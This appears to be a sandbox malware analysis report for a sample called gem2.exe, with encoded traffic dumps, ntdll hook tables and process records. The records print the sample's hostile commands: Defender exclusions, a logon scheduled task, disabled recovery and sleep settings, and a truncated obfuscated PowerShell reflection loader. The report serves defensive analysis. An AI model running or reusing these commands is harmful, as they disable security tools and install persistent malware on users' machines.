                                                              2025-01-12 08:26:32 UTC1369INData Raw: 49 57 7a 2b 6f 49 6c 47 64 57 35 68 31 74 46 5a 49 57 7a 2b 6f 49 6c 79 64 57 35 68 31 73 46 5a 49 57 7a 2b 6f 49 6c 2b 64 57 35 68 31 71 31 5a 49 57 7a 2b 6f 49 6c 71 64 57 35 68 4d 2f 36 6f 50 7a 65 32 4f 2b 71 41 39 49 4b 78 62 48 56 75 4d 6a 72 2b 74 4f 71 64 4a 75 63 55 6c 49 70 37 49 55 77 31 62 75 71 38 2f 43 75 64 34 66 68 65 6e 70 4f 4b 68 76 32 61 69 70 48 6b 72 41 46 45 4d 6a 71 4b 65 77 56 4d 4e 57 37 6b 72 41 46 77 4e 75 63 34 6b 75 7a 5a 52 5a 47 65 6b 79 61 52 46 4a 54 2b 6c 67 65 66 30 4a 46 30 43 46 55 75 59 65 6d 31 47 34 55 7a 4b 7a 57 6f 72 79 44 6c 6a 65 2b 5a 44 6a 49 36 49 67 5a 68 37 48 56 75 43 32 7a 38 49 34 47 54 59 46 5a 42 4c 48 58 6c 56 46 42 56 4c 6d 45 38 69 72 6a 71 74 4d 39 75 49 57 78 31 58 61 48 6e 76 7a 7a 71 6c 78 4f
                                                              Data Ascii: IWz+oIlGdW5h1tFZIWz+oIlydW5h1sFZIWz+oIl+dW5h1q1ZIWz+oIlqdW5hM/6oPze2O+qA9IKxbHVuMjr+tOqdJucUlIp7IUw1buq8/Cud4fhenpOKhv2aipHkrAFEMjqKewVMNW7krAFwNuc4kuzZRZGekyaRFJT+lgef0JF0CFUuYem1G4UzKzWoryDlje+ZDjI6IgZh7HVuC2z8I4GTYFZBLHXlVFBVLmE8irjqtM9uIWx1XaHnvzzqlxO
                                                              2025-01-12 08:26:32 UTC1369INData Raw: 53 78 68 4c 33 55 71 59 53 6c 31 4b 47 45 72 64 53 5a 68 4a 58 55 6b 59 53 64 31 49 6d 45 68 64 53 42 68 49 33 55 2b 59 54 31 31 50 47 45 2f 64 54 70 68 4f 58 55 34 59 54 74 31 4e 6d 45 31 64 54 52 68 62 48 56 75 59 54 42 31 62 6d 45 2f 64 54 64 68 50 33 55 36 59 53 6c 31 49 32 46 73 64 57 35 68 41 67 45 4b 44 51 42 62 43 67 30 41 64 57 35 68 50 67 45 43 4a 67 6b 42 4f 41 51 65 42 67 63 4f 41 6e 56 75 59 53 6b 74 4b 32 45 2f 64 53 46 68 4b 6e 55 36 59 54 74 31 4c 32 45 2b 64 53 74 68 62 48 56 75 59 55 68 31 49 6d 45 68 64 54 5a 68 48 33 55 61 59 51 31 31 43 57 45 4a 64 52 78 68 62 48 56 75 59 55 68 31 49 6d 45 68 64 54 5a 68 48 33 55 59 59 51 39 31 58 57 46 65 64 57 35 68 53 48 55 69 59 53 46 31 4e 6d 45 66 64 52 68 68 44 33 56 59 59 56 68 31 62 6d 45 63
                                                              Data Ascii: SxhL3UqYSl1KGErdSZhJXUkYSd1ImEhdSBhI3U+YT11PGE/dTphOXU4YTt1NmE1dTRhbHVuYTB1bmE/dTdhP3U6YSl1I2FsdW5hAgEKDQBbCg0AdW5hPgECJgkBOAQeBgcOAnVuYSktK2E/dSFhKnU6YTt1L2E+dSthbHVuYUh1ImEhdTZhH3UaYQ11CWEJdRxhbHVuYUh1ImEhdTZhH3UYYQ91XWFedW5hSHUiYSF1NmEfdRhhD3VYYVh1bmEc
                                                              2025-01-12 08:26:32 UTC1369INData Raw: 68 31 51 6d 45 74 64 51 42 68 48 33 55 48 59 53 39 31 41 6d 45 4e 64 52 31 68 48 33 56 43 59 53 31 31 47 32 45 59 64 51 46 68 4c 33 55 43 59 51 31 31 48 57 45 66 64 51 35 68 51 48 55 31 59 53 46 31 47 32 45 41 64 52 70 68 42 58 55 4e 59 51 31 31 48 57 45 59 64 53 70 68 43 58 55 43 59 51 6c 31 43 57 45 4e 64 52 70 68 43 58 55 7a 59 55 56 31 56 57 46 49 64 54 70 68 46 58 55 65 59 51 6c 31 4c 47 45 5a 64 51 64 68 41 48 55 4b 59 51 6c 31 48 47 46 43 64 53 70 68 43 58 55 49 59 51 56 31 41 47 45 4a 64 53 31 68 41 33 55 41 59 52 39 31 47 6d 45 65 64 52 74 68 44 33 55 61 59 51 4e 31 48 47 46 45 64 51 35 68 50 6e 55 36 59 54 39 31 48 6d 45 4a 64 51 31 68 42 58 55 50 59 51 42 31 49 47 45 4e 64 51 4e 68 43 58 56 43 59 53 52 31 42 32 45 49 64 51 74 68 4c 6e 55 58 59
                                                              Data Ascii: h1QmEtdQBhH3UHYS91AmENdR1hH3VCYS11G2EYdQFhL3UCYQ11HWEfdQ5hQHU1YSF1G2EAdRphBXUNYQ11HWEYdSphCXUCYQl1CWENdRphCXUzYUV1VWFIdTphFXUeYQl1LGEZdQdhAHUKYQl1HGFCdSphCXUIYQV1AGEJdS1hA3UAYR91GmEedRthD3UaYQN1HGFEdQ5hPnU6YT91HmEJdQ1hBXUPYQB1IGENdQNhCXVCYSR1B2EIdQthLnUXY
                                                              2025-01-12 08:26:32 UTC1369INData Raw: 68 58 58 55 7a 59 55 4a 31 4b 32 45 64 64 52 74 68 44 58 55 43 59 52 39 31 52 6d 45 4d 64 54 31 68 46 58 55 64 59 52 68 31 43 32 45 42 64 55 42 68 43 48 55 43 59 51 42 31 44 6d 46 46 64 52 4e 68 52 58 56 41 59 53 74 31 43 32 45 59 64 54 70 68 46 58 55 65 59 51 6c 31 52 6d 45 4d 64 53 4e 68 42 58 55 4e 59 52 35 31 41 57 45 66 64 51 46 68 43 6e 55 61 59 55 4a 31 4f 57 45 46 64 51 42 68 58 33 56 63 59 55 4a 31 4f 32 45 43 64 52 31 68 44 58 55 49 59 51 6c 31 49 47 45 4e 64 52 70 68 42 58 55 59 59 51 6c 31 49 32 45 4a 64 52 70 68 42 48 55 42 59 51 68 31 48 57 45 4d 64 55 64 68 56 33 56 4b 59 53 74 31 43 32 45 59 64 54 35 68 48 6e 55 42 59 51 39 31 4c 32 45 49 64 51 70 68 48 6e 55 4c 59 52 39 31 48 57 46 52 64 55 70 68 49 6e 55 50 59 52 68 31 42 32 45 61 64 51
                                                              Data Ascii: hXXUzYUJ1K2EddRthDXUCYR91RmEMdT1hFXUdYRh1C2EBdUBhCHUCYQB1DmFFdRNhRXVAYSt1C2EYdTphFXUeYQl1RmEMdSNhBXUNYR51AWEfdQFhCnUaYUJ1OWEFdQBhX3VcYUJ1O2ECdR1hDXUIYQl1IGENdRphBXUYYQl1I2EJdRphBHUBYQh1HWEMdUdhV3VKYSt1C2EYdT5hHnUBYQ91L2EIdQphHnULYR91HWFRdUphInUPYRh1B2EadQ
                                                              2025-01-12 08:26:32 UTC1369INData Raw: 51 47 45 49 64 51 4a 68 41 48 55 4f 59 55 56 31 52 32 46 46 64 56 56 68 53 48 55 69 59 51 4e 31 44 32 45 49 64 53 4a 68 42 58 55 4d 59 52 35 31 44 32 45 65 64 52 64 68 50 48 55 61 59 52 35 31 55 32 46 49 64 53 6c 68 43 58 55 61 59 54 78 31 48 47 45 44 64 51 31 68 4c 58 55 4b 59 51 68 31 48 47 45 4a 64 52 31 68 48 33 56 41 59 53 56 31 41 47 45 61 64 51 46 68 42 33 55 4c 59 55 52 31 53 6d 45 69 64 52 74 68 41 48 55 43 59 55 42 31 4c 6d 46 45 64 54 56 68 49 33 55 4d 59 51 5a 31 43 32 45 50 64 52 70 68 4d 58 56 4b 59 53 64 31 43 32 45 65 64 51 42 68 43 58 55 43 59 56 39 31 58 47 45 38 64 52 70 68 48 6e 56 43 59 54 64 31 49 57 45 4f 64 51 52 68 43 58 55 4e 59 52 68 31 4d 32 46 45 64 51 35 68 49 48 55 42 59 51 31 31 43 6d 45 67 64 51 64 68 44 6e 55 63 59 51 31
                                                              Data Ascii: QGEIdQJhAHUOYUV1R2FFdVVhSHUiYQN1D2EIdSJhBXUMYR51D2EedRdhPHUaYR51U2FIdSlhCXUaYTx1HGEDdQ1hLXUKYQh1HGEJdR1hH3VAYSV1AGEadQFhB3ULYUR1SmEidRthAHUCYUB1LmFEdTVhI3UMYQZ1C2EPdRphMXVKYSd1C2EedQBhCXUCYV91XGE8dRphHnVCYTd1IWEOdQRhCXUNYRh1M2FEdQ5hIHUBYQ11CmEgdQdhDnUcYQ1
                                                              2025-01-12 08:26:32 UTC1369INData Raw: 6e 55 61 59 52 6c 31 44 32 45 41 64 54 35 68 48 6e 55 42 59 52 68 31 43 32 45 50 64 52 70 68 50 48 55 61 59 52 35 31 51 6d 46 49 64 54 68 68 42 58 55 63 59 52 68 31 47 32 45 4e 64 51 4a 68 50 48 55 63 59 51 4e 31 47 6d 45 4a 64 51 31 68 47 48 55 71 59 51 6c 31 41 6d 45 4a 64 51 6c 68 44 58 55 61 59 51 6c 31 52 32 46 43 64 53 64 68 41 6e 55 59 59 51 4e 31 42 57 45 4a 64 55 5a 68 53 48 55 76 59 51 46 31 48 57 45 46 64 54 31 68 44 33 55 50 59 51 4a 31 4c 47 45 5a 64 51 68 68 43 6e 55 4c 59 52 35 31 50 6d 45 59 64 52 78 68 51 48 55 31 59 52 6c 31 42 32 45 43 64 52 70 68 58 33 56 63 59 54 46 31 56 6d 46 41 64 56 70 68 51 48 55 31 59 52 35 31 43 32 45 4b 64 54 4e 68 53 48 55 68 59 51 42 31 43 6d 45 38 64 52 78 68 41 33 55 61 59 51 6c 31 44 57 45 59 64 55 64 68
                                                              Data Ascii: nUaYRl1D2EAdT5hHnUBYRh1C2EPdRphPHUaYR51QmFIdThhBXUcYRh1G2ENdQJhPHUcYQN1GmEJdQ1hGHUqYQl1AmEJdQlhDXUaYQl1R2FCdSdhAnUYYQN1BWEJdUZhSHUvYQF1HWEFdT1hD3UPYQJ1LGEZdQhhCnULYR51PmEYdRxhQHU1YRl1B2ECdRphX3VcYTF1VmFAdVphQHU1YR51C2EKdTNhSHUhYQB1CmE8dRxhA3UaYQl1DWEYdUdh


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.749847104.26.12.2054432236C:\Windows\System32\curl.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-12 08:26:42 UTC77OUTGET / HTTP/1.1
                                                              Host: api.ipify.org
                                                              User-Agent: curl/7.83.1
                                                              Accept: */*
                                                              2025-01-12 08:26:42 UTC424INHTTP/1.1 200 OK
                                                              Date: Sun, 12 Jan 2025 08:26:42 GMT
                                                              Content-Type: text/plain
                                                              Content-Length: 12
                                                              Connection: close
                                                              Vary: Origin
                                                              CF-Cache-Status: DYNAMIC
                                                              Server: cloudflare
                                                              CF-RAY: 900bc360aec68c96-EWR
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2022&min_rtt=2018&rtt_var=765&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=715&delivery_rate=1422308&cwnd=188&unsent_bytes=0&cid=dce4ff62d10081ba&ts=156&x=0"
                                                              2025-01-12 08:26:42 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                              Data Ascii: 8.46.123.189


                                                              Code Manipulations

                                                              User Modules

                                                              Hook Summary

                                                              Function NameHook TypeActive in Processes
                                                              ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                              NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                              ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                                              NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                              ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                              NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                              NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                              ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                              ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                              NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                                              RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                                              NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                              NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                              ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                              ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe

                                                              Processes

                                                              Process: explorer.exe, Module: ntdll.dll
                                                              Function NameHook TypeNew Data
                                                              ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                              NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                              ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                              NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                              ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                              NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                              NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                              ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                              ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                              NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                              RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                              NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                              NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                              ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                              ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                              Process: winlogon.exe, Module: ntdll.dll
                                                              Function NameHook TypeNew Data
                                                              ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                              NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                              ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                              NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                              ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                              NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                              NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                              ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                              ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                              NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                              RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                              NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                              NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                              ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                              ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:03:26:13
                                                              Start date:12/01/2025
                                                              Path:C:\Users\user\Desktop\gem2.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\Desktop\gem2.exe"
                                                              Imagebase:0x7ff7cf280000
                                                              File size:538'624 bytes
                                                              MD5 hash:BE89D598CD96443479C02B022FF70532
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:1
                                                              Start time:03:26:13
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'"
                                                              Imagebase:0x7ff741d30000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:2
                                                              Start time:03:26:13
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:9
                                                              Start time:03:26:17
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                              Imagebase:0x7ff7fb730000
                                                              File size:496'640 bytes
                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                              Has elevated privileges:true
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:12
                                                              Start time:03:26:19
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\schtasks.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:SCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F
                                                              Imagebase:0x7ff727440000
                                                              File size:235'008 bytes
                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:13
                                                              Start time:03:26:20
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:14
                                                              Start time:03:26:20
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\System-f4855f59e0.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\System-f4855f59e0.exe
                                                              Imagebase:0x7ff6a54a0000
                                                              File size:538'624 bytes
                                                              MD5 hash:BE89D598CD96443479C02B022FF70532
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 53%, ReversingLabs
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:16
                                                              Start time:03:26:30
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\svchost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\svchost.exe
                                                              Imagebase:0x7ff7b4ee0000
                                                              File size:55'320 bytes
                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              General

                                                              Target ID:17
                                                              Start time:03:26:31
                                                              Start date:12/01/2025
                                                              Path:C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe"
                                                              Imagebase:0x7ff7d1630000
                                                              File size:538'624 bytes
                                                              MD5 hash:BE89D598CD96443479C02B022FF70532
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 53%, ReversingLabs
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:18
                                                              Start time:03:26:31
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:powercfg -change standby-timeout-ac 0
                                                              Imagebase:0x7ff751f60000
                                                              File size:96'256 bytes
                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              General

                                                              Target ID:19
                                                              Start time:03:26:31
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:powercfg -change monitor-timeout-ac 0
                                                              Imagebase:0x7ff751f60000
                                                              File size:96'256 bytes
                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              General

                                                              Target ID:20
                                                              Start time:03:26:31
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:21
                                                              Start time:03:26:31
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:powercfg /setacvalueindex SCHEME_CURRENT SUB_BUTTONS LIDACTION 0
                                                              Imagebase:0x7ff751f60000
                                                              File size:96'256 bytes
                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:22
                                                              Start time:03:26:31
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:23
                                                              Start time:03:26:31
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:powercfg /setactive SCHEME_CURRENT
                                                              Imagebase:0x7ff751f60000
                                                              File size:96'256 bytes
                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:24
                                                              Start time:03:26:31
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:25
                                                              Start time:03:26:31
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\SysWOW64\explorer.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SysWOW64\explorer.exe"
                                                              Imagebase:0xae0000
                                                              File size:4'514'184 bytes
                                                              MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:26
                                                              Start time:03:26:31
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\cmd.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:cmd.exe /C reagentc /disable
                                                              Imagebase:0x7ff63cb60000
                                                              File size:289'792 bytes
                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:27
                                                              Start time:03:26:31
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:28
                                                              Start time:03:26:31
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:30
                                                              Start time:03:26:32
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\ReAgentc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:reagentc /disable
                                                              Imagebase:0x7ff7d0300000
                                                              File size:44'544 bytes
                                                              MD5 hash:A109CC3B919C7D40E4114966340F39E5
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:31
                                                              Start time:03:26:32
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:EtrMmUyKmezi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lQOtNkEZiwxXMY,[Parameter(Position=1)][Type]$pZbFqViXVD)$sbBqvXXfarI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+'D'+''+[Char](101)+''+[Char](108)+''+'e'+'ga'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+'m'+[Char](111)+''+[Char](114)+'y'+[Char](77)+'od'+'u'+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'','C'+'l'+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'led'+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+'i'+''+'C'+''+[Char](108)+''+'a'+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'to'+'C'+'l'+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$sbBqvXXfarI.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$lQOtNkEZiwxXMY).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+'ed');$sbBqvXXfarI.DefineMethod(''+'I'+''+[Char](110)+''+'v'+''+'o'+''+[Char](107)+''+'e'+'',''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+'i'+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+'ot'+[Char](44)+'V'+[Char](105)+''+[Char](114)+'tual',$pZbFqViXVD,$lQOtNkEZiwxXMY).Se